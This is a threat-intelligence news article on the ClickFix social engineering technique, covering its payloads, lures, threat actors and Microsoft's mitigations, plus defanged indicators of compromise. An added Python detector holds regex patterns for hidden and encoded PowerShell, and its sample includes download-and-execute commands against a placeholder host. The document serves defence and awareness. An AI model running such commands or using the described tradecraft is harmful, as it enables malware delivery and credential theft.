Microsoft Threat Intelligence has spotlighted the escalating adoption of the ClickFix social engineering technique, a sophisticated method that manipulates users into executing malicious commands on their devices, bypassing traditional automated security defenses.
Observed since early 2024, this tactic has targeted thousands of enterprise and end-user systems daily, delivering payloads such as Lumma Stealer infostealers, remote access trojans (RATs) like Xworm and AsyncRAT, loaders including Latrodectus, and rootkits based on modified r77 open-source code.
Rising Threat of Social Engineering
By exploiting users' inclination to resolve minor technical glitches, such as fake CAPTCHA verifications or error prompts, ClickFix integrates with phishing, malvertising, and drive-by compromises, often impersonating trusted brands to erode suspicion.
The attack chain typically initiates through deceptive landing pages that instruct victims to copy and paste obfuscated commands into the Windows Run dialog (Win + R), Windows Terminal, or PowerShell, leading to fileless malware injection into living-off-the-land binaries (LOLBins) like msbuild.exe or regasm.exe.
Microsoft notes that these payloads frequently operate in memory as .NET assemblies or Common Language Runtime (CLR) modules, enabling stealthy persistence, data exfiltration, and lateral movement.
A notable case study involves the Lampion malware campaign, active since May 2025, which targets sectors like government and finance in multiple countries via phishing emails containing ZIP-archived HTML redirects to spoofed tax authority sites.

This multi-stage infection downloads obfuscated VBScripts, schedules tasks for reconnaissance and antivirus evasion, and culminates in banking credential theft, though some instances failed to deliver the final payload due to commented-out code.
Cross-Platform Evolution
The technique’s adaptability extends beyond Windows, with campaigns since late May 2025 targeting macOS users to deploy Atomic macOS Stealer (AMOS), which harvests browser cookies, passwords, and cryptocurrency wallets.
In these scenarios, lures mimic services like Spectrum, prompting users to run Bash scripts that capture system passwords via dscl authentication and bypass macOS quarantine with xattr commands.
Threat actors enhance evasion through JavaScript obfuscation, remote code loading from disparate servers, and command-line tactics like Base64 encoding, string concatenation, escaped characters, and nested LOLBin executions (e.g., repeated cmd.exe invocations).
Arrival vectors include phishing with HTML attachments or URLs routed through traffic direction systems (TDS) like Prometheus, malvertising on pirated streaming sites that rename HTA scripts to media extensions (.mp3, .mp4), and drive-by compromises of WordPress sites spoofing Cloudflare Turnstile.
Microsoft identifies Storm-series actors (e.g., Storm-1607, Storm-0426) as key perpetrators, with campaigns impersonating entities like the US Social Security Administration to install tools like ScreenConnect for remote control.
Underground markets offer ClickFix kits for $200–$1,500 monthly, featuring customizable lures, VM detection bypass, and UAC evasion.
To counter this, Microsoft recommends user education on social engineering, enabling Defender XDR features like AMSI scanning for PowerShell and HTA scripts, network protection to block C2 domains, and attack surface reduction rules to restrict obfuscated script execution.
Detections span Microsoft Defender Antivirus (e.g., Behavior:Win32/ClickFix) and Microsoft Defender for Endpoint alerts for suspicious RunMRU registry entries.
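As an added example (not code from Microsoft's report), the following Python triages RunMRU values for the command-line patterns the article lists: script hosts and LOLBins, hidden or Base64-encoded PowerShell, nested cmd.exe, escaped characters, string concatenation, and HTA lures renamed to media extensions. The registry sample, the example.invalid hostnames and the function names are constructed for illustration.

```python
import base64
import re

# Regexes for the ClickFix command-line tradecraft the article describes: script hosts,
# hidden/encoded PowerShell, downloads, caret escapes, concatenation, nested cmd.exe, HTA-as-media.
SIGNALS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|msbuild|regasm)\b", re.I),
    "encoded_cmd": re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|e)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_or_bypass": re.compile(r"-(?:w|win|windowstyle)\s*hidden|-nop\b|-ep\s+bypass", re.I),
    "download": re.compile(r"\b(curl|iwr|irm|invoke-webrequest|downloadstring)\b|https?://", re.I),
    "caret_escape": re.compile(r"\^[a-z]", re.I),
    "string_concat": re.compile(r"['\"]\s*\+\s*['\"]"),
    "nested_cmd": re.compile(r"cmd(?:\.exe)?\s*/c.*cmd(?:\.exe)?\s*/c", re.I),
    "hta_as_media": re.compile(r"mshta\b.*\.(mp3|mp4)\b", re.I),
}

def decode_encoded_command(command):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand, or None."""
    m = SIGNALS["encoded_cmd"].search(command)
    try:  # AttributeError covers "no match" (m is None); ValueError covers bad base64
        return base64.b64decode(m.group(0).split()[-1], validate=True).decode("utf-16le")
    except (AttributeError, ValueError, UnicodeDecodeError):
        return None

def parse_runmru(values):
    """Yield (name, command) most-recent-first; Explorer stores '<cmd>\\1' per value, order in MRUList."""
    order = [n for n in values.get("MRUList", "") if n in values]
    order += [n for n in values if n != "MRUList" and n not in order]
    for name in order:
        cmd = values[name]
        yield name, cmd[:-2] if cmd.endswith("\\1") else cmd

def triage_runmru(values):
    """Tag each RunMRU entry with the signals it triggers (decoded payload included)."""
    findings = []
    for name, cmd in parse_runmru(values):
        decoded = decode_encoded_command(cmd)
        text = cmd + " " + (decoded or "")
        hits = [k for k, rx in SIGNALS.items() if rx.search(text)]
        findings.append({"value": name, "command": cmd, "signals": hits, "decoded": decoded})
    return findings

# Constructed sample of HKCU\...\Explorer\RunMRU as a dict; the encoded command is built here only so the sample is self-contained.
ENC = base64.b64encode("IEX (iwr http://example.invalid/x)".encode("utf-16le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": f"powershell -w hidden -nop -enc {ENC}\\1",
    "c": "cmd /c cmd /c mshta http://example.invalid/verify.mp4\\1",
}
```

Any entry with a non-empty signal list is worth an analyst's look; the decoded field surfaces what an encoded command would actually run.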
Indicators of Compromise (IOCs)
Indicator | Type | Description
---|---|---
mein-lonos-cloude[.]de | Domain | ClickFix landing page for MintsLoader
derko-meru[.]online | Domain | MintsLoader C2
tesra[.]shop | Domain | Lumma Stealer malvertising
cqsf[.]live | Domain | Latrodectus drive-by
access-ssa-gov[.]es | Domain | SSA phishing landing page
binancepizza[.]info | Domain | General ClickFix landing page
panel-spectrum[.]net | Domain | AMOS campaign landing page
185.234.72[.]186 | IP | OBSCURE#BAT C2
45.94.31[.]176 | IP | OBSCURE#BAT C2
3.138.123[.]13 | IP | Lampion campaign